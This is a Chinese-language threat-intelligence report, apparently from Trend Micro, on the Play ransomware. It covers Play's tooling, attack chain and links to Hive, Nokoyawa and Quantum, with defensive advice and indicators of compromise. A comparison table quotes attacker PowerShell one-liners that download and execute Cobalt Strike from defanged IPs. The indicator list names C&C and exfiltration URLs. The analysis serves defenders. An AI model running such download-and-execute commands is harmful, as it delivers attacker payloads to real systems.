Play似乎是一個模仿 Hive 和 Nokoyawa 攻擊手法的最新勒索病毒，它們之間存在著許多相似之處，意味著 Play 和 Nokoyawa 的幕後集團很可能是同一批人。

今年 7 月，趨勢科技在拉丁美洲地區調查了多起以政府機關為目標的勒索病毒

攻擊案例， 根據我們判斷，這些案例應該是「Play」勒索病毒所為，其名稱由來是因為它會在被加密的檔案名稱末端加上「.play」副檔名。此外，它的勒索訊息檔案內容也只包含了「PLAY」一個字，還有勒索病毒集團的聯絡電子郵件地址 (圖 1)。最早通報此勒索病毒的受害者是 2022 年 6 月在 Bleeping Computer 論壇上發表貼文的一名用戶。一個月後， No-logs No breach 網站又發布了更多有關 Play 勒索病毒的細節。 

在進一步分析此勒索病毒的感染案例之後，我們發現 Play 採用了很多跟 Hive 和 Nokoyawa 勒索病毒一樣的攻擊手法 (表 1 和 2)，包括使用的工具和惡意檔案名稱和路徑都很像。今年稍早，我們曾發現一些證據指出 Nokayawa 的幕後集團與 Hive 有所關連，因為兩者的攻擊程序相似。

值得注意的是，Play 勒索病毒有一項行為和 Hive 及 Nokoyawa 都不同，那就是在探索階段使用 AdFind 指令列工具來蒐集 Active Directory (AD) 的資訊 (圖 2)。反觀 Hive 則是使用 TrojanSpy.DATASPY  這類木馬程式來蒐集有關受害系統的資訊。

指標	目的	Nokoyawa 和 Hive 勒索病毒	Play 勒索病毒
Nekto/PriviCMD	提升權限	✓	✓
Cobalt Strike	準備階段	✓	✓
Coroxy/SystemBC	遠端存取	✓	✓
GMER	躲避防禦	✓	✓
PCHunter	探索與躲避防禦	✓
AdFind	探索		✓
PowerShell 腳本	探索	✓
PsExec	散播勒索病毒	✓	✓

手法/工具	Nokoyawa 和 Hive 勒索病毒	Play 勒索病毒
Nekto/PriviCMD	%public%\Music\svhost.exe	%userprofile%\Music\t2747.exe
下載 Cobalt Strike	-nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘_hxxp://185.150.117[.]186:80/asdfgsdhsdfgsdfg’))”	-nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘hxxp://84.32.190[.]37:80/ahgffxvbghgfv’))”
Coroxy/SystemBC	%userprofile\Pictures\socks.exe %systemroot%\System32\sok.exe	%public%\Music\soks.exe
散播勒索病毒	C:\PerfLogs\xxx.exe %mytemp%\xxx.exe	C:\PerfLogs\xxx.exe %mytemp%\xxx.exe
攻擊目標	大多位於拉丁美洲	大多位於拉丁美洲

表 2：比較 Play 和 Nokoyawa/Hive 勒索病毒家族在攻擊工具和手法上的相似之處。

相關惡意程式攻擊行動

儘管並非所有我們分析的 Play 勒索病毒感染案例都與 Hive 和 Nokoyawa 勒索病毒有相同的惡意程式指標，但它們在手法和工具上卻有許多相同之處，顯示這些勒索病毒家族之間有很高的機率彼此相關，值得我們深入調查，所以我們就查了一下 Play 勒索病毒感染案例相關網址的浮水印。這是為了判斷它們是否真的與過去的 Hive 感染案例有所關連，就像我們之前在研究 Nokoyawa 感染案例所做的一樣。

不僅如此，我們還發現證據指出 Play 勒索病毒和 Quantum 勒索病毒集團也有所關連，後者是惡名昭彰的 Conti 勒索病毒集團的分支。Play 在攻擊中使用的 Cobalt Strike 信標與 Quantum 勒索病毒透過 Emotet 及 SVCReady 殭屍網路散播的 Cobalt Strike 信標有相同的浮水印 (206546002)，顯示這兩個勒索病毒集團都使用同一個基礎架構。

此外，我們在調查期間也發現受害者可能曾經感染 Emotet 的痕跡，儘管目前並無垃圾郵件攻擊行動是使用 Emotet 木馬程式，但我們曾經偵測到幾個案例是使用 Emotet 來散播 Cobalt Strike 信標，而且與 Play 勒索病毒攻擊使用的信標擁有相同的浮水印 (206546002)。

攻擊過程

根據目前已知的情況，Play 勒索病毒集團是使用已遭入侵的合法帳號、或經由未修補的 Fortinet SSL VPN 漏洞來進入受害機構的網路 (圖 3)。就像大多數現代化勒索病毒一樣，Play 也會在攻擊時使用一些合法工具，例如，它會使用遠端檔案傳輸工具 WinSCP 來將資料外傳、使用 Windows 工作管理員 (Task Manager) 來傾印 Local Security Authority Server Service (LSASS) 處理程序的記憶體以取得登入憑證。

此外，Play 勒索病毒也使用雙重勒索技巧來威脅受害者。在攻擊時，它會先將資料外傳，然後再植入勒索病毒，並使用 WinRAR 將受害者的檔案壓縮之後上傳到分享網站。勒索病毒的執行檔是透過群組原則物件 (GPO) 散布，然後再透過排程工作、PsExec 或 wmic 來執行。

突破防線

Play 勒索病毒集團通常利用一些在多個平台上重複使用、或是先前已遭入侵、或是經由非法方式取得的合法帳號，其中也包括虛擬私人網路 (VPN) 帳號，而非只有網域或本機帳號。此外，暴露在外的遠端桌面 (RDP) 伺服器也是他們建立灘頭堡的方式之一。另一個 Play 勒索病毒使用的技巧是攻擊 FortiOS 的漏洞： CVE-2018-13379  和 CVE-2020-12812。

CVE-2018-13379 是 FortiOS SSL VPN 網頁入口的一個路徑瀏覽漏洞，可讓未經認證的駭客利用一個特製的 HTTP 資源請求來下載作業系統檔案。至於 CVE-2020-12812 則是 FortiOS SSL VPN 一個認證程序上的漏洞，可讓使用者在修改使用者名稱大小寫的情況下避開 FortiToken 雙重認證。

執行攻擊

我們發現，Play 勒索病毒的執行檔是透過排程工作和 PsExec 來執行。另一個 Play 使用的技巧是透過群組原則物件 (GPO) 來執行勒索病毒，因為 GPO 可用控制 AD 環境中的使用者與電腦設定。這個 GPO 會在整個 AD 環境套用一個排程工作，此工作會在特定日期和時間執行勒索病毒。  

不僅如此，勒索病毒還會利用批次檔來執行 PsExec，這是 Windows 官方疑難排解工具套件「SysInternals」當中的一個工具。此工具可在其他系統上執行處理程序，因此可用來快速散播勒索病毒，並有助於 Play 執行偵查行動。

常駐系統

當 Play 勒索病毒集團利用合法帳號進入企業之後，接下來會繼續利用同樣的帳號在系統內常駐。如果受害系統的遠端桌面協定 (RDP) 被關閉，駭客會先使用「netsh」指令來將它開啟，以便從遠端連線到受害系統。勒索病毒執行檔會下載到網域控制器 (Domain Controller) 的共用資料夾 (NETLOGON 或 SYSVOL)，然後再經由排程工作或 PsExec 來將它執行，接下來受害者的檔案就會被加密。 

提升權限

Play 勒索病毒使用 Mimikatz 來從記憶體當中擷取高權限的登入憑證。接著，勒索病毒會增加一些帳號到特權群組當中，其中一個群組就是 Domain Administrators (網域系統管理員) 群組。它會利用一個專門用來搜尋權限提升途徑的腳本：Windows Privilege Escalation Awesome Scripts (WinPEAS) 來搜尋系統上的漏洞。

躲避防禦

此勒索病毒會使用 Process Hacker、GMER、IOBit 和 PowerTool 之類的工具來停用惡意程式防護與系統監控軟體。此外，還會使用 Windows 內建的「wevtutil」工具或批次檔來清除自己的足跡，刪除它曾經留下的所有痕跡，例如：Windows 事件記錄或一些惡意檔案。它會使用 PowerShell 或「命令提示字元」來停用 Windows Defender 的防護功能。Play 勒索病毒使用的 PowerShell 腳本都經過 base64 編碼，就像 Cobalt Strike 信標 (Cobeacon) 或 Empire 代理程式一樣。

存取登入憑證

Play 勒索病毒還會使用 Mimikatz 來擷取登入憑證。此工具會被直接植入目標主機或當成一個模組並使用幕後操縱 (C&C) 工具 (如 Empire 或 Cobalt Strike) 來加以執行。我們也發現此勒索病毒會使用 Windows 的工作管理員來傾印 LSASS 處理程序的記憶體。

探索

在探索階段，此勒索病毒會蒐集有關 AD 環境的更多詳細資訊。我們觀察到一些針對遠端系統的 AD 查詢，分別來自不同工具，如：ADFind、Microsoft Nltest 和 Bloodhound。另外，駭客還會蒐集主機名稱、共用資料夾、網域等等的系統資訊。

橫向移動

Play 勒索病毒會使用幾種不同工具在受害機構內橫向移動：

• Cobalt Strike SMB 信標是一個可當成 C&C 信標、橫向移動方法，以及下載與執行檔案的工具。
• SystemBC 是一個 SOCKS5 代理器殭屍 (proxy bot)，這是一個具備 TOR 通訊能力的後門程式，用來提供後門讓駭客進出。
• Empire 是一個開放原始碼漏洞攻擊後續工具框架，用來執行 Play 勒索病毒的漏洞攻擊後續活動。
• Mimikatz 可用來傾印登入憑證和取得受害網路的網域系統管理員權限，以便執行橫向移動。 

資料外傳

Play 勒索病毒在將受害者資料外傳之前，會先將資料切割成多個部分 (而非完整的檔案)，這是為了避免資料在網路傳輸時被發現。傳輸時，駭客使用的是 WinSCP 程式，這是一個 Microsoft Windows 適用的 SFTP 用戶端及 FTP 用戶端。此外，駭客也使用 WinRAR 來將檔案壓縮成「.RAR」格式以方便傳輸。同時，我們也找到了一個採用 PHP 撰寫的網頁，專門用來接收駭客外傳的檔案。

衝擊

正如前面提到，勒索病毒在將檔案加密之後，會在檔案名稱末端加上一個「.play」副檔名。同時還會在本機硬碟 (C:) 根目錄產生一個名為「ReadMe.txt」的勒索訊息檔案。在所有我們研究的案例中，勒索訊息當中都包含一個以下格式的電子郵件地址：[7 個隨機字元]@gmx[.]com  

感染分布情況

和 Hive 及 Nokoyawa 勒索病毒一樣，Play 絕大部分的攻擊對象都是拉丁美洲地區的企業機構，尤其以巴西最多。此外，阿根廷、匈牙利、印度、荷蘭及西班牙也曾出現 Play 的攻擊。 

資安建議

根據趨勢科技對 Play 勒索病毒的研究，此勒索病毒是專為躲避偵測而設計，企業應小心一些專門利用滲透測試工具來潛入目標系統環境的駭客。

企業和一般使用者可採取以下資安措施來防範像 Play 這樣的勒索病毒： 

• 啟用多重認證 (MFA) 防止駭客在網路內部橫向移動。
• 遵守 3-2-1 原則來備份重要檔案：3 份備份、2 種儲存媒體、1 個不同的存放地點。 
• 定期修補及更新系統，讓作業系統與應用程式隨時保持更新非常重要，並且要建立一套修補更新管理程序，這樣才能防止駭客利用軟體漏洞。

除此之外，使用者和企業若可以採用一套多層式偵測及回應解決方案，也能發揮不錯效益，例如 Trend Micro Vision One™ 即提供了強大的 XDR 功能，可蒐集並自動交叉關聯來自多個防護層的資料，涵蓋電子郵件、端點、伺服器、雲端工作負載以及網路，藉由自動化的防護來防範攻擊，並確保不遺漏任何重要事件。此外還有 Trend Micro Apex One™ 可提供進一步的自動化威脅偵測及回應來防範端點遭遇進階威脅，例如駭客植入的勒索病毒。 

入侵指標 (IoC)

雜湊碼 

SHA-256	偵測名稱	說明
fc2b98c4f03a246f6564cc778c03f1f9057510efb578ed3e9d8e8b0e5516bd49	Trojan.Win64.PRIVICMD.YXCHW	PRIVICMD/NEKTO
c316627897a78558356662a6c64621ae25c3c3893f4b363a4b3f27086246038d	Backdoor.Win32.COBEACON.YXCH3	Cobalt Strike
c92c158d7c37fea795114fa6491fe5f145ad2f8c08776b18ae79db811e8e36a3	PUA.Win32.AdFind.A	AdFind
e1c75f863749a522b244bfa09fb694b0cc2ae0048b4ab72cb74fcf73d971777b	Trojan.BAT.ADFIND.YECGUT	AdFind 指令列工具
094d1476331d6f693f1d546b53f1c1a42863e6cde014e2ed655f3cbe63e5ecde	HackTool.Win32.ToolPow.SM	PowerTool
e8a3e804a96c716a3e9b69195db6ffb0d33e2433af871e4d4e1eab3097237173	PUA.Win32.GMER.YABBI	GMER
d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f	PUA.Win32.ProcHack.C	Process Hacker
c88b284bac8cd639861c6f364808fac2594f0069208e756d2f66f943a23e3022	Backdoor.Win32.SYSTEMBC.YXCFLZ	Coroxy/SystemBC
f18bc899bcacd28aaa016d220ea8df4db540795e588f8887fe8ee9b697ef819f	Ransom.Win32.PLAYCRYPT.YECGUT	Play 勒索病毒
e641b622b1f180fe189e3f39b3466b16ca5040b5a1869e5d30c92cca5727d3f0	Ransom.Win32.PLAYDE.A	Play 勒索病毒
608e2b023dc8f7e02ae2000fc7dbfc24e47807d1e4264cbd6bb5839c81f91934	Ransom.Win32.PLAYDE.YXCHJT	Play 勒索病毒
006ae41910887f0811a3ba2868ef9576bbd265216554850112319af878f06e55	Ransom.Win32.PLAYDE.YXCHJT	Play 勒索病毒
e4f32fe39ce7f9f293ccbfde30adfdc36caf7cfb6ccc396870527f45534b840b	Ransom.Win32.PLAYDE.YXCHJT	Play 勒索病毒
8962de34e5d63228d5ab037c87262e5b13bb9c17e73e5db7d6be4212d66f1c22	Ransom.Win32.PLAYDE.YXCHJT	Play 勒索病毒
5573cbe13c0dbfd3d0e467b9907f3a89c1c133c774ada906ea256e228ae885d5	Ransom.Win32.PLAYDE.YXCHJT	Play 勒索病毒
f6072ff57c1cfe74b88f521d70c524bcbbb60c561705e9febe033f51131be408	Ransom.Win32.PLAYDE.YXCHJT	Play 勒索病毒
7d14b98cdc1b898bd0d9be80398fc59ab560e8c44e0a9dedac8ad4ece3d450b0	Ransom.Win32.PLAYDE.YXCHJT	Play 勒索病毒
dcaf62ee4637397b2aaa73dbe41cfb514c71565f1d4770944c9b678cd2545087	Ransom.Win32.PLAYDE.YXCHJT	Play 勒索病毒
f5c2391dbd7ebb28d36d7089ef04f1bd9d366a31e3902abed1755708207498c0	Ransom.Win32.PLAYDE.YACHWT	Play 勒索病毒
3e6317229d122073f57264d6f69ae3e145decad3666ddad8173c942e80588e69	Ransom.Win32.PLAYDE.YACHP	Play 勒索病毒

網址

網址	說明
hxxp://84.32.190[.]37:80/ahgffxvbghgfv	下載 Cobalt Strike
hxxp://newspraize[.]com	Cobalt Strike C&C
hxxp://realmacnow[.]com	Cobalt Strike C&C
172.67.176[.]244	Cobalt Strike C&C
104.21.43[.]80	Cobalt Strike C&C
hxxp://67.205.182[.]129/u2/upload[.]php	資料外傳C&C 伺服器

原文出處：Play 勒索病毒攻擊手法類似 Hive 和 Nokoyawa 作者：Don Ovid Ladores、Lucas Silva、Scott Burden、Janus Agcaoili、Ivan Nicole Chavez、Ian Kenefick、Ieriz Nicolle Gonzalez 以及 Paul Pajares

  一般用戶

假使您也不幸成了受害者，請保持冷靜，最好向外尋求協助，但不要支付贖金。而平時，最好可以安裝一套防毒軟體的即時防護。如 趨勢科技 PC-cillin 的「勒索剋星」可為您的寶貴檔案提供多一層防護。》立即免費下載試用

   企業用戶
建議企業採用一套跨世代的多層式防護技術來防止最新勒索病毒攻擊，在適當時機套用適當的技術來保護您的使用者和資料。》立即前往了解